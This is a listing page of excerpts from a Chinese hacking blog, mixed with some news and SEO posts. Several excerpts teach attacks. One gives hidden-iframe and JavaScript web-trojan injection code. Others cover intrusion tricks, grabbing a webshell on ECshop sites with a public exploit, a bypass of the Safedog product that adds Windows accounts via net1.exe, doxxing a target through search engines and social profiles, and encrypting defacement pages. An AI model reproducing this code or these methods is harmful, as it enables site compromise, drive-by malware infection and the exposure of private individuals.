• 一些常用的网页挂马代码

    一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write(“<iframe width=’0′ height=’0′ src=’地址’></iframe>”); 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:js变形加密 <SCRIPT langu...阅读全文
    作者:qxz_xp | 发布:2013年10月18日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
  • 入侵网站时用到的十种小方法

    1.例如我们的目标网址为“http://www.xxxx.cn/forum/index.php”那么我们把地址改为http://www.xxxx.cn/forum/index.PHP后再浏览看看是否存在页面,如果存在的话,则服务器所使用的系统为windows,如果显示不存在,则服务器很有可能使用的是*nix系统。   2. Ewebeditor编辑器拿站的新方法 Ewebeditor编辑器 大家应该是再熟悉不过的吧?我们找到后台登录的地方后,先用默认...阅读全文
    作者:qxz_xp | 发布:2013年10月18日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
  • 分享个人的一些社工思路

    分享本人的一些社工思路吧,社工是一个很强大的入侵方式,下面我就分享一下本人的社工思路吧。 1.baidu google 搜目标的QQ号 常用ID 电话号码等等与之有关的 (可以得到一些有用信息后在加以扩大搜索范围) 2.完成第1步时基本会出现一些有用信息比如:贴吧里可以得到 (IP地址  毕业学校 出生日期 爱好的游戏 邮件地址等等…贴吧是个好东西) 3.通过QQ空间 其它交友博...阅读全文
    作者:qxz_xp | 发布:2013年10月18日 | 分类:社工相关, 黑客技术, 黑客攻防 | 暂无评论
  • ECshop商城系统后台拿webshell方法

    之前,网上爆出了ecshop最新的0day .论坛里也有人直接给出了EXP 相信好多基友都拿了不少的站吧. 这几天正好有个朋友要我帮忙拿一个站 看了一下,ecshop的  直接用exp 爆出了用户名和密码.. 接下来 就该拿shell了 在网上搜了一下, 看到了不少拿shell的方法 都试了一下,但是没有一个成功的  应该是都补上了. 群里一朋友 给介绍了一个思路 试了一下  竟然成功了 不多说了   ...阅读全文
    作者:qxz_xp | 发布:2013年10月17日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • 台湾高二中学生2个月入侵1200多个网站

    许姓高二学生在被黑计算机,留下“V怪客”图样。 人民网10月17日电 据台湾《联合报》报道,台湾许姓高二学生二个月内骇入岛内外多所大学、政府机关及公司一千二百多个网站,还故意留下电影“V怪客”图像,昨天被警方依妨害计算机使用罪嫌函送法办。 许姓学生在网络上自称“灰帽黑客”,自诩为“网络自由斗士”;他表示很崇拜漫画改编的电影“V怪客”,侵入网站只是想提醒对方注意...阅读全文
    作者:qxz_xp | 发布:2013年10月17日 | 分类:业界新闻, 黑客攻防 | 暂无评论
  • 电脑小技巧 在你电脑右下角显示你的名字方法

    想不想在自己的电脑右下角显示你的名字或你爱人的名字呢?下面来看设置方法,很简单的小技巧。 第一步:点击开始菜单→设置→控制面板→区域和语言选项 如图: 第二步:点击自定义 如图: 第三步:时间 时间格式设置 时间格式(T)里的hh:mm:ss前加两个tt  tt hh:mm:ss  如果你想让你的名字在时间的后面显示,你可以把tt打在后面  hh:mm:ss tt  然后后在AM符号(M):里打上你的名...阅读全文
    作者:qxz_xp | 发布:2013年10月16日 | 分类:其它技术, 电脑维修 | 2条评论
  • 关于SEO优化一些关键词的讨论

    SEO优化不得不提的即是关键字优化,每个站长对SEO优化都有不相同的观点,但没有人会脱离关键字这个论题,这也是站长们的不合地点。每个人进入互联网职业的进程都不相同,或许在读过他人的一些经历后,满腔热血的加入了SEO队伍。而他们的一次次失利通知咱们,不要凭三分钟热度去做SEO。许多SEOER在刚入行时会有相同的困惑,不管怎么尽力,他们的关键字排行都上不去,即便排行...阅读全文
    作者:qxz_xp | 发布:2013年10月16日 | 分类:seo优化, 网站运营 | 暂无评论
  • 浅谈爆库和社工库扫描 做好密码安全防范措施

    只要你有微博,且关注互联网就会知道:国内最大的开发者社区CSDN的明文用户密码数据库已经被黑客拿到,并在2011年12月21日,在网上出现了广泛传播的版本,642万用户名密码信息已经成为公开的信息。常见密码存储方式对于用户来讲,用户密码信息显然是非常重要的,我们当然有必要了解社区管理者是如果保存我们的机密信息的。目前网站中主流存放用户名和密码的方式有三种: 1. ...阅读全文
    作者:qxz_xp | 发布:2013年10月15日 | 分类:安全知识, 网络安全 | 1条评论
  • 新版安全狗 添加账户存在绕过问题

    新版安全狗 4.0.05221 添加账户存在绕过问题 经测试发现, 1.安全狗只是针对c:\windows\system32\下的net.exe做了限制,net1.exe可以正常使用,使用方法为:c:\\windows\\system32\\net1.exe user 账户 密码 /ADD, 注意下,这里是双斜杠。。。单斜杠是无法使用的。。 2.安全狗貌似采用的是黑名单的方式,只是限制了net.exe,再其他目录下,将net.exe改名为任意名字,可继...阅读全文
    作者:qxz_xp | 发布:2013年10月15日 | 分类:黑客技术, 黑客攻防 | 暂无评论
  • 黑客经常入侵政府网站做黑色利益链

    不仅是为炫耀技术,更为非法捞金  黑客频“入侵”政府网站 背后有条“黑金”利益链 日前,湖北省公安县计生局网站被网民发现涉黄,官方回应为“黑客攻击”,这一事件引发网民热议。原本是政府形象和信息公开的窗口,政府网站缘何越来越受黑客青睐?“中国网事”记者调查发现,政府网站已经不仅是黑客炫耀技术的舞台,利用网站漏洞进行“非法勾当”,竟催生出了一条分工明确、衔接紧密...阅读全文
    作者:qxz_xp | 发布:2013年10月14日 | 分类:业界新闻, 黑客攻防 | 暂无评论
  • 分享一款好用的黑页加密工具

    黑页加密工具截图: 这是一款网页加密工具,可对网页进行加密,可根据您的需求选择加密强度,分为: 最小,适中,较大,最大 如果各位想自己编写的黑页,不想让他人轻松盗走,可以使用此款软件对自己的黑页进行加密。 通过加密可以使您的网页html源码看上去就像一堆乱码,使您的网页资源不被窃取。 加密前的黑页: 加密后的黑页效果: 下载地址:http://pan.baidu.com/s/1...阅读全文
    作者:qxz_xp | 发布:2013年10月13日 | 分类:黑客工具, 黑客攻防 | 3条评论
  • wordpress网站linux和win主机URL伪静态设置方法详解

    做伪静态是能够更好的利于网站的SEO优化。 目前大部分网站的搭建都是采用动态网页技术实现的,然而现阶段的搜索引擎对于动态的网站抓取效果并不是很好,所以你经常会听到说搜索引擎不喜欢动态的链接,也就是在url中带有“?”的网址,那么怎么修改这种动态的url格式呢? 一般我们采用的方法是url伪静态设置,就是让链接看起来像是静态的,比如xxx.com/1.html这种格式,wordpre...阅读全文
    作者:qxz_xp | 发布:2013年10月12日 | 分类:seo优化, 网站建设, 网站运营 | 1条评论